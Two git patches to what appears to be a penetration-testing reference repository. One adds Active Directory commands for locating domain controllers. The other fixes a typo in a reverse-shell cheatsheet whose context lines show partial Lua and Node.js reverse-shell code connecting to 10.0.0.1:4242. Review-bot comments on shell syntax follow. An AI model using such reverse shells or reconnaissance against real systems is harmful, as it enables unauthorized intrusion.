From 310338b279a74dabcea688e1743fc8da4dc0055e Mon Sep 17 00:00:00 2001 From: Seb <5796850+sebch-@users.noreply.github.com> Date: Tue, 2 Aug 2022 15:09:23 +0200 Subject: [PATCH 1/2] Update Active Directory Attack.md Find AD --- Methodology and Resources/Active Directory Attack.md | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index a7c3d4c..033c61e 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -460,10 +460,15 @@ Replace the customqueries.json file located at `/home/username/.config/bloodhoun ### Other Interesting Commands -- **Find Domain Controller** +- **Find Domain Controllers** ```ps1 nslookup domain.com nslookup -type=srv _ldap._tcp.dc._msdcs..com + nltest /dclist:domain.com + Get-ADDomainController -filter * | Select-Object name + gpresult /r + $Env:LOGONSERVER + echo %LOGONSERVER% ``` ## Most common paths to AD compromise 
@@ -3863,4 +3868,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [Certifried: Active Directory Domain Privilege Escalation (CVE-2022–26923) - Oliver Lyak](https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4) * [bloodyAD and CVE-2022-26923 - soka - 11 May 2022](https://cravaterouge.github.io/ad/privesc/2022/05/11/bloodyad-and-CVE-2022-26923.html) * [DIVING INTO PRE-CREATED COMPUTER ACCOUNTS - May 10, 2022 - By Oddvar Moe](https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts/) -* [How NOT to use the PAM trust - Leveraging Shadow Principals for Cross Forest Attacks - Thursday, April 18, 2019 - Nikhil SamratAshok Mittal](http://www.labofapenetrationtester.com/2019/04/abusing-PAM.html) \ No newline at end of file +* [How NOT to use the PAM trust - Leveraging Shadow Principals for Cross Forest Attacks - Thursday, April 18, 2019 - Nikhil SamratAshok Mittal](http://www.labofapenetrationtester.com/2019/04/abusing-PAM.html) From bb6c9ed172c673451edef9fde5c0ca8a4ca9d32e Mon Sep 17 00:00:00 2001 From: Spidycodes <40536205+spidyhackx@users.noreply.github.com> Date: Tue, 2 Aug 2022 21:48:07 +0000 Subject: [PATCH 2/2] typo --- Methodology and Resources/Reverse Shell Cheatsheet.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index e1da152..01355b3 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -343,7 +343,7 @@ lua5.1 -e 'local host, port = "10.0.0.1", 4242 local socket = require("socket") sh.stdout.pipe(client); sh.stderr.pipe(client); }); - return /a/; // Prevents the Node.js application form crashing + return /a/; // Prevents the Node.js application from crashing })();
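Review bot: in the first hunk of PATCH 1/2 (`@@ -460,10 +460,15 @@`, the "Find Domain Controllers" block), the added `echo %LOGONSERVER%` is cmd.exe syntax inside a fence tagged `ps1`. Pasted into PowerShell it prints the literal string `%LOGONSERVER%`, and the `$Env:LOGONSERVER` line just above it already covers that shell. Suggest marking each added line with the shell it expects (for example a trailing `# cmd.exe` comment) or splitting the block in two. `Get-ADDomainController` also needs the ActiveDirectory PowerShell module, which the list does not mention; a one-line comment would save readers a "command not found" detour. Finally, the unchanged context line `nslookup -type=srv _ldap._tcp.dc._msdcs..com` has an empty label between the two dots, which looks like a lost placeholder. Since this hunk adds `domain.com` examples directly below it, it would be consistent to repair that line in the same change.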
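Review bot: the second hunk of PATCH 1/2 (`@@ -3863,4 +3868,4 @@`, the last reference entry) only adds the missing newline at end of file, which is unrelated to the subject "Update Active Directory Attack.md Find AD". The change itself is fine, but it should either be mentioned in the commit message or go in its own commit so that the history for the reference list is not attributed to a content change.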